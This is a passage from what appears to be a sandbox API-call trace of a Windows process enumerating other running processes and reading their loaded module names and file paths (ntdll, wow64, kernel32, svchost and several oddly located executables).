lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.384] CoTaskMemFree (pv=0x780780) [0044.384] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x256c328, cb=0x18 | out: lpmodinfo=0x256c328*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0044.385] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.385] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0044.385] CoTaskMemFree (pv=0x780780) [0044.385] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.385] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0044.386] CoTaskMemFree (pv=0x780780) [0044.386] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x256e4e8, cb=0x18 | out: lpmodinfo=0x256e4e8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0044.386] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.386] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.386] CoTaskMemFree (pv=0x780780) [0044.386] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.386] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.387] CoTaskMemFree (pv=0x780780) [0044.387] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25706b8, cb=0x18 | out: lpmodinfo=0x25706b8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.387] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.387] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.388] CoTaskMemFree (pv=0x780780) [0044.388] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.388] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.389] CoTaskMemFree (pv=0x780780) [0044.389] CloseHandle (hObject=0x218) returned 1 [0044.389] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x218 [0044.389] EnumProcessModules (in: hProcess=0x218, lphModule=0x2572dc8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2572dc8, lpcbNeeded=0x41eb20) returned 1 [0044.390] GetModuleInformation (in: hProcess=0x218, hModule=0x340000, lpmodinfo=0x2573038, cb=0x18 | out: lpmodinfo=0x2573038*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0044.390] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.390] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x340000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ccv_server.exe") returned 0xe [0044.391] CoTaskMemFree (pv=0x780780) [0044.391] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.391] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x340000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\ccv_server.exe" (normalized: "c:\\program files (x86)\\windows mail\\ccv_server.exe")) returned 0x32 [0044.391] CoTaskMemFree (pv=0x780780) [0044.391] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2575260, cb=0x18 | out: lpmodinfo=0x2575260*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.392] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.392] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.392] CoTaskMemFree (pv=0x780780) [0044.392] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.392] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.392] CoTaskMemFree (pv=0x780780) [0044.392] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2577420, cb=0x18 | out: lpmodinfo=0x2577420*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0044.393] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.393] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0044.393] CoTaskMemFree (pv=0x780780) [0044.393] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.393] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0044.394] CoTaskMemFree (pv=0x780780) [0044.394] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25795e0, cb=0x18 | out: lpmodinfo=0x25795e0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0044.394] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.394] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.394] CoTaskMemFree (pv=0x780780) [0044.394] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.395] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.395] CoTaskMemFree (pv=0x780780) [0044.395] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x257b7b0, cb=0x18 | out: lpmodinfo=0x257b7b0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.395] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.395] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.396] CoTaskMemFree (pv=0x780780) [0044.396] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.396] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.396] CoTaskMemFree (pv=0x780780) [0044.396] CloseHandle (hObject=0x218) returned 1 [0044.397] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x218 [0044.397] EnumProcessModules (in: hProcess=0x218, lphModule=0x257ded8, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x257ded8, lpcbNeeded=0x41eb20) returned 1 [0044.397] GetModuleInformation (in: hProcess=0x218, hModule=0x260000, lpmodinfo=0x257e148, cb=0x18 | out: lpmodinfo=0x257e148*(lpBaseOfDll=0x260000, SizeOfImage=0x17000, EntryPoint=0x2614a1)) returned 1 [0044.397] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.398] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x260000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="assume on.exe") returned 0xd [0044.398] CoTaskMemFree (pv=0x780780) [0044.398] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.398] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x260000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Uninstall Information\\assume on.exe" (normalized: "c:\\program files (x86)\\uninstall information\\assume on.exe")) returned 0x3a [0044.398] CoTaskMemFree (pv=0x780780) [0044.398] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2580380, cb=0x18 | out: lpmodinfo=0x2580380*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.398] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.398] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.399] CoTaskMemFree (pv=0x780780) [0044.399] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.399] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.399] CoTaskMemFree (pv=0x780780) [0044.399] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2582540, cb=0x18 | out: lpmodinfo=0x2582540*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0044.400] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.400] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0044.400] CoTaskMemFree (pv=0x780780) [0044.400] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.400] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0044.401] CoTaskMemFree (pv=0x780780) [0044.401] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2584700, cb=0x18 | out: lpmodinfo=0x2584700*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0044.401] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.401] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.402] CoTaskMemFree (pv=0x780780) [0044.402] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.402] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.402] CoTaskMemFree (pv=0x780780) [0044.402] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25868d0, cb=0x18 | out: lpmodinfo=0x25868d0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.403] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.403] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.403] CoTaskMemFree (pv=0x780780) [0044.404] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.404] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.404] CoTaskMemFree (pv=0x780780) [0044.404] CloseHandle (hObject=0x218) returned 1 [0044.404] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x218 [0044.404] EnumProcessModules (in: hProcess=0x218, lphModule=0x2588fe0, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2588fe0, lpcbNeeded=0x41eb20) returned 1 [0044.405] GetModuleInformation (in: hProcess=0x218, hModule=0x1280000, lpmodinfo=0x2589250, cb=0x18 | out: lpmodinfo=0x2589250*(lpBaseOfDll=0x1280000, SizeOfImage=0x17000, EntryPoint=0x12814a1)) returned 1 [0044.405] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.405] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1280000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0044.405] CoTaskMemFree (pv=0x780780) [0044.405] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.405] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1280000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\gmailnotifierpro.exe" (normalized: "c:\\program files\\windows media player\\gmailnotifierpro.exe")) returned 0x3a [0044.406] CoTaskMemFree (pv=0x780780) [0044.406] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x258b498, cb=0x18 | out: lpmodinfo=0x258b498*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.406] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.406] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.406] CoTaskMemFree (pv=0x780780) [0044.406] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.406] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.407] CoTaskMemFree (pv=0x780780) [0044.407] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x258d658, cb=0x18 | out: lpmodinfo=0x258d658*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0044.407] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.407] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0044.408] CoTaskMemFree (pv=0x780780) [0044.408] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.408] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0044.408] CoTaskMemFree (pv=0x780780) [0044.408] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x258f818, cb=0x18 | out: lpmodinfo=0x258f818*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0044.409] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.409] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.409] CoTaskMemFree (pv=0x780780) [0044.409] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.409] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.409] CoTaskMemFree (pv=0x780780) [0044.410] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25919e8, cb=0x18 | out: lpmodinfo=0x25919e8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.410] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.410] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.411] CoTaskMemFree (pv=0x780780) [0044.411] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.411] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.411] CoTaskMemFree (pv=0x780780) [0044.411] CloseHandle (hObject=0x218) returned 1 [0044.412] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x218 [0044.412] EnumProcessModules (in: hProcess=0x218, lphModule=0x2594110, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2594110, lpcbNeeded=0x41eb20) returned 1 [0044.419] EnumProcessModules (in: hProcess=0x218, lphModule=0x2594328, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x2594328, lpcbNeeded=0x41eb20) returned 1 [0044.427] EnumProcessModules (in: hProcess=0x218, lphModule=0x2594740, cb=0x800, lpcbNeeded=0x41eb20 | out: lphModule=0x2594740, lpcbNeeded=0x41eb20) returned 1 [0044.434] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x2594fb0, cb=0x18 | out: lpmodinfo=0x2594fb0*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0044.435] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.435] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0044.435] CoTaskMemFree (pv=0x780780) [0044.435] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.435] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0044.435] CoTaskMemFree (pv=0x780780) [0044.435] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25971a8, cb=0x18 | out: lpmodinfo=0x25971a8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.436] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0044.436] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.436] CoTaskMemFree (pv=0x780780) [0044.436] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.437] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2599368, cb=0x18 | out: lpmodinfo=0x2599368*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0044.437] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0044.437] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0044.438] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x259b538, cb=0x18 | out: lpmodinfo=0x259b538*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0044.438] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0044.439] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0044.439] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x259d708, cb=0x18 | out: lpmodinfo=0x259d708*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0044.439] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0044.440] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0044.440] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x259f920, cb=0x18 | out: lpmodinfo=0x259f920*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0044.441] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0044.441] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0044.442] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x25a1ae0, cb=0x18 | out: lpmodinfo=0x25a1ae0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0044.443] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0044.443] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0044.444] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x25a3ca0, cb=0x18 | out: lpmodinfo=0x25a3ca0*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0044.445] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0044.445] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0044.446] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x25a5e60, cb=0x18 | out: lpmodinfo=0x25a5e60*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0044.446] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0044.448] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0044.449] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x25a80d0, cb=0x18 | out: lpmodinfo=0x25a80d0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0044.450] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0044.450] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0044.451] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x25aa290, cb=0x18 | out: lpmodinfo=0x25aa290*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0044.452] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0044.453] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0044.453] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x25ac440, cb=0x18 | out: lpmodinfo=0x25ac440*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0044.454] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0044.455] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0044.456] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x25ae600, cb=0x18 | out: lpmodinfo=0x25ae600*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0044.457] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0044.458] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0044.459] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x25b07c0, cb=0x18 | out: lpmodinfo=0x25b07c0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0044.460] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0044.461] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0044.462] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x25b2980, cb=0x18 | out: lpmodinfo=0x25b2980*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0044.463] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0044.464] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0044.465] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x25b4b50, cb=0x18 | out: lpmodinfo=0x25b4b50*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0044.466] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0044.467] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0044.468] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb410000, lpmodinfo=0x25b6d20, cb=0x18 | out: lpmodinfo=0x25b6d20*(lpBaseOfDll=0x7fefb410000, SizeOfImage=0xc2000, EntryPoint=0x7fefb41101c)) returned 1 [0044.469] 